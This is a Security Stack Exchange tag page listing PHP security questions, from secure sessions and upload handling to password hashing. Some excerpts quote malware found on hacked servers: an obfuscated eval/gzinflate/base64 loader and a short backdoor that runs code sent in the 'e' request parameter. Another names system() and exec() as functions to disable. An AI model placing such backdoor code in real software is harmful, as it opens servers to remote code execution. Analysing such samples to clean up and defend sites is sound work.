Questions tagged [php]

Security aspects concerning code written in the programming language PHP which is often used for web applications.

1619 questions
38 votes, 1 answer

default.php file found on the server, is this a security threat?

I found a file named "default.php" on the server with the following code eval(gzinflate(base64_decode( …
Vaibhav
18 votes, 3 answers

Creating Secure PHP Sessions

I have already created and refined both registration and login systems. However, I am led to believe the tricky part comes when you are creating a session. As far as I know this is due to both Hijacking and fixation. Which in all honesty I don't…
TuKritical
18 votes, 2 answers

What does this suspicious PHP code do?

I'm cleaning up a website after an attack which resulted in many PHP shells being uploaded. I've found and removed the following code: if(isset($_REQUEST['e'])) { $b="ass"."ert";$a=$b($_REQUEST['e']);${'a'}; } Could you tell me what it does? How…
user136206
11 votes, 2 answers

Obfuscated php code found on the server

I found this piece of code hosted on my website. I'm sure it's malware. Does anyone have an idea what this script does or how to deobfuscate it?
calculataur
9 votes, 2 answers

Is it possible to disable all PHP functions not used in my application?

I want to secure my PHP installation. I can disable some functions, like system(), exec() etc using disable_functions in php.ini. But I can forget to disable some dangerous functions. Is it possible to disable all functions, excluding the ones…
checkbox
8 votes, 3 answers

CLI API that requires plaintext user details

I've been tasked with writing a module for my company to interface with an external API. This API has a syntax similar to SSH where I have to incorporate the user details as well as the host address of the server I'm trying to connect to. …
Max
8 votes, 2 answers

Secure PHP upload form & storage

I am building a PHP application that allows uploads of files (.doc/pdf etc) for review by a staff member. Some of these files will be somewhat confidential so I need to protect them. Now the best solution would be to get the sender to encrypt these…
user350325
8 votes, 3 answers

Starting a secure php session

I have been looking into creating secure php sessions for use in a login script for a week or so now. So far I have not found a concrete resource to base my work off, reading StackOverflow all I have seen is mixed views and opinions. I decided to…
TuKritical
7 votes, 3 answers

DB Passwords: More Secure in a PHP App's .ini config files or apache2 environment variables?

I manage a php app whose key variables (such as database server addresses, DB user names and passwords, etc) change depending on their environment (Dev, QA, Production, etc.). In order to simplify deployment, I have started moving some environment…
6 votes, 4 answers

What security features should a PHP framework have?

What security features would you find useful or expect from a PHP framework? I have a PHP framework that I've developed that I'm going to be releasing as an open source project, but I want to make sure that it has appropriate security features. Here…
VirtuosiMedia
6 votes, 2 answers

How to safely display external pictures?

I want to write (and am currently writing) a php script to display external images, not hosted on my website. Something like Facebook's safe_image. What I'm currently doing is file_get_contents('pic') (or curl) the url and checking for httpcode and…
GodHand
6 votes, 3 answers

PHP crypt() or phpass for storing passwords?

When storing passwords, should I use PHP's built in crypt or phpass? If using crypt, should I use CRYPT_SHA512 or CRYPT_BLOWFISH?
willwill
6 votes, 2 answers

Why don't we use MAC address instead of IP address?

I can use the system function in PHP to get the MAC address of site visitors (probably most of you know). Why do we use IP address to check whether someone is stealing a cookie or not? Does the system function have more overhead, or is it still…
Alireza
5 votes, 3 answers

Can I limit PHP include() to specific directory trees?

I know I can use the php.ini open_basedir directive to limit the directory trees where files can be opened by PHP. But in a directory structure such as this: ├── application │   ├── index.php │   └── www ├── logs └── uploads └──…
Aaron Adams
5 votes, 3 answers

Security risks using tmpfile() for sensitive data in PHP

What are the primary concerns when storing sensitive data in PHP's temporary directory via tmpfile()? For instance: Could this data be recovered from HDD by a malicious admin? Could the admin easily change the tmp directory to a permanent storage…
Sam Tuke